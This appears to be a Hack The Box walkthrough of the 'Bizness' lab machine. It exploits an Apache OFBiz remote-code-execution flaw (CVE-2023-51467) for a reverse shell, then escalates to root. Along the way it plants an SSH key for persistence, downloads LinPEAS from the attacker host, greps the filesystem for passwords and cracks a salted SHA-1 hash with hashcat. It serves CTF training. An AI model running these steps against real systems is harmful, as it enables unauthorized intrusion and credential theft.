Bizness (Hack The Box) Walkthrough

• 4 min read
HTB

A step‑by‑step walkthrough of the Hack The Box Bizness machine, from initial recon to RCE in Apache OFBiz and final root compromise via password hash cracking.

Overview of the Bizness Box

A structured walkthrough of the "Bizness" Hack The Box machine, covering reconnaissance, exploitation of Apache OFBiz (CVE-2023-51467), and privilege escalation to root, with all commands and screenshots preserved.

Engagement Phases

In this walkthrough we will follow these phases:

  1. Information Gathering
  2. Directory Enumeration
  3. Vulnerability Analysis
  4. Exploitation
  5. Privilege Escalation

Phase I: Information Gathering

Initial Reconnaissance with Nmap

We start with a full TCP port scan using nmap to identify exposed services.

sudo nmap -p- --min-rate 10000 10.10.11.252

Key Results:

  • Open Ports: 22 (SSH), 80 (HTTP), 443 (HTTPS), 38621 (Unknown)
  • Hostname: bizness.htb (mapped to 10.10.11.252 in /etc/hosts)

After adding the host entry, we browse to https://bizness.htb, but the landing page does not immediately reveal anything sensitive.

Web Interface

BIZNESS Homepage

Phase II: Directory Enumeration

Enumerating Paths with dirsearch

Next, we enumerate web paths to uncover hidden or less obvious entry points using dirsearch.

dirsearch -q -u https://bizness.htb -i 200,300-399

Findings:

  • Discovered a login page at http://bizness.htb/control/login
  • Identified the application as Apache OFBiz, which becomes our primary target

Visual Evidence

dirsearch OUTPUTdirsearch OUTPUT

Login Page

Phase III: Vulnerability Analysis

Identifying the Apache OFBiz RCE

With Apache OFBiz identified, we search for public vulnerabilities associated with the version in use. This leads us to a critical Remote Code Execution vulnerability:

  • CVE: CVE-2023-51467
  • Impact: Unauthenticated RCE on Apache OFBiz

Reference:

Phase IV: Exploitation

Obtaining a Public Exploit

We use a publicly available proof-of-concept designed for exploiting this OFBiz RCE:

Gaining Initial Foothold (Reverse Shell)

Using the exploit, we obtain a reverse shell back to our attacking machine:

python3 exploit.py https://bizness.htb/ shell <IP-tun0>:<PORT>

On successful exploitation, we get a remote shell on the target.

Shell Stabilization

We turn the basic shell into a more interactive one:

python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
# Background the shell with Ctrl+Z, then:
stty raw -echo; fg
reset xterm

Foothold Confirmation:

Reverse shell successfully obtained.

With a stable shell, we capture the user flag:

cat ~/user.txt

Phase V: Privilege Escalation

Establishing Persistent SSH Access

To make further work easier, we configure SSH key-based access using the ofbiz user account:

cd /home/ofbiz/
mkdir .ssh
echo [your_public_key] > ~/.ssh/authorized_keys

Then connect from the local machine:

ssh -i [private_key] ofbiz@bizness.htb

Local Enumeration Attempts

Searching for SUID Binaries

We first check for potential SUID binaries that might be exploitable:

find / -type f -perm /4000 2>/dev/null

Result: No obviously exploitable SUID binaries are identified.

Looking for Interesting Listening Ports

We inspect listening ports and network connections:

netstat -ano

Result: No particularly interesting internal services are exposed.

Automated Enumeration with LinPEAS

We run linpeas.sh to automatically search for misconfigurations and common privilege escalation vectors.

On the target machine:

cd /tmp
wget http://<IP-tun0>:<port>/linpeas.sh
bash ./linpeas.sh

For offline review, we capture the output:

bash ./linpeas.sh > /tmp/linpease.txt

On the local machine:

scp -i ~/.ssh/id_rsa ofbiz@bizness.htb:/tmp/linpease.txt ./

Outcome: LinPEAS does not immediately reveal a straightforward escalation vector, suggesting we need a more targeted approach.

Discovering Password Artifacts

Grepping for Password References

We pivot to a manual search for password-related strings across the filesystem:

grep -aRinH --color -o -E '(\w+\w+){0,5}password(\w+\w+){0,5}'

Findings:

  • Files indicating password usage
  • A SHA-1 hash and a .dat file that contains a Base64-encoded SHA-1 structure

Evidence:

Files indicating password-related data.

We also identify an XML file containing a hashed password:

SHA-1 password hashed

The search reveals a value in the form:

$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I

Additional inspection of the .dat file shows a Base64-encoded structure representing a SHA-1 hash and salt:

SHA-1 structure and stored value.

Preparing the Hash for Cracking

Helper Script

To simplify extraction and formatting of the hash, we reference a helper script:

Normalizing Base64 for Hashcat

The stored value uses base64.urlsafe_b64encode(), which replaces / with _ and + with -.
To convert this into a standard Base64 string and then into hex for Hashcat, we leverage CyberChef:

  • Recipe (conceptually):
  • Replace _ with /
  • Replace - with +
  • Decode from Base64
  • Convert to Hex

CyberChef link used:

Cleaning and transforming the stored hash for cracking.

Cracking the Hash with Hashcat

Once the hash and salt are converted to the appropriate format, we use Hashcat with mode 120 (for salted SHA-1) and the rockyou.txt wordlist:

hashcat -m 120 -a 0 "b8fd3f41a541a435857a8f3e751cc3a91c174362:d" rockyou.txt

After some time, Hashcat successfully recovers the plaintext password.

Password successfully cracked.

Root password is: monkeybizness

Elevating to Root and Capturing the Flag

With the root password in hand, we escalate privileges:

su root
# Enter the password: monkeybizness
cat /root/root.txt

Root compromise and flag retrieval.

Related Reports

Analysis: Hard Windows Box on Hack The Box

January 20, 2024
Read Report →